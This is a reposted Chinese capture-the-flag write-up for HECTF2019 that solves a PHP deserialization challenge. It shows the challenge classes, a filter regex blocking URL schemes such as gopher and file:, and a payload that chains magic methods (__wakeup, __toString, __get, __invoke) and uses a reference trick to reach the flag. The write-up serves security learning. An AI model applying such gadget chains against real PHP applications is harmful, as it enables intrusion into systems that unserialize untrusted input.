[wp] HECTF2019 让我们一起来变魔术吧 - 代码天地

[wp] HECTF2019 让我们一起来变魔术吧

其他 2020-03-15 14:39:31 阅读次数: 0

<?php
class Read {
    public $var;
    public $token;
    public $token_flag;
    public function __construct() {
        $this->token_flag = $this->token = md5(rand(1,10000));
    }
    public function __invoke(){
        $this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
        {
            echo "flag{**********}";
        }
    }
}

class Show{
    public $source;
    public $str;
    public function __construct()
    {
        echo $this->source."<br>";
    }

    public function __toString()
    {
        $this->str['str']->source;
        return '2333';
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}

class Test
{
    public $params;
    public function __construct()
    {
        $this->params = array();
    }

    public function __get($key)
    {
        $func = $this->params;
        return $func();
    }
}


//payload
$x = new Test();
$a = new Show();
$b = new Show();
$c = new Read();
$c->token_flag = &$c->token;
$a->source = $b;
$a->source->str = ["str"=>$x];
$x->params = $c;
var_dump($b = serialize($a));

unserialize($b);

主要是

if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source))

这里的preg_match可以触发this->source的__toString(),长知识了

MercyLin

发布了32 篇原创文章 · 获赞 9 · 访问量 1万+

私信关注

猜你喜欢

转载自blog.csdn.net/qq_40884727/article/details/102913660

[wp] HECTF2019 让我们一起来变魔术吧

HECTF 部分wp

hackergame 2019 WP（只是一些我会的）

DDCTF 2019 部分WP

2019 NCTF Re WP

Syclover2019 WP

GXYCTF2019WP

[ZJCTF 2019]Login的wp

[ZJCTF 2019]EasyHeap的wp

让我们一起来改变自己吧

让我们一起来做最漂亮的Android界面吧！

让我们一起来部署Nacos集群吧～

让我们一起来备战蓝桥杯与CCF-CSP吧

让我们一起来了解什么是人工智能吧

我要放弃 wp 了

让我们一起云估算吧

2019DDCTF web wp

2019 红帽杯 Re WP

2019红帽杯部分wp

2019xman-shellmaster wp

[GXYCTF2019]BabyUpload WP

[wp] RCTF2019-nextphp

OGEEK2019 babyrop wp

【GXYCTF2019】BabySQLi wp

让我们一起来认识和学习一下MapReduce吧

让我们与星际联盟彭老师——一起来探究区块链的世界吧

ogg怎么转mp3格式？让我们一起来学习吧

实验吧忘记密码了？wp

gfsj开始之路，我的wp

DDCTF2019 的三道题wp

今日推荐

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

最强开源大模型 Llama 3 上架 Gitee AI

虽然老乡鸡开源的不是代码，但背后的原因却让人很暖心

周排行

决策树的部分理解

STM32软件IIC的实现

RocketMQ原理解析-HA

vue-动态路由（路由的传参和接参）

利用python对Excel中的特定数据提取并写入新表

【Ubuntu】 Ubuntu16.04搭建NFS服务

Elasticsearch基础操作与对应的curl命令行，python对接实现

JVM数据存储结构 & Java的值传递和址传递

yum命令使用指南

java基础（一）：java语法基础

每日归档

更多

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)

2024-04-16(70)

2024-04-15(42)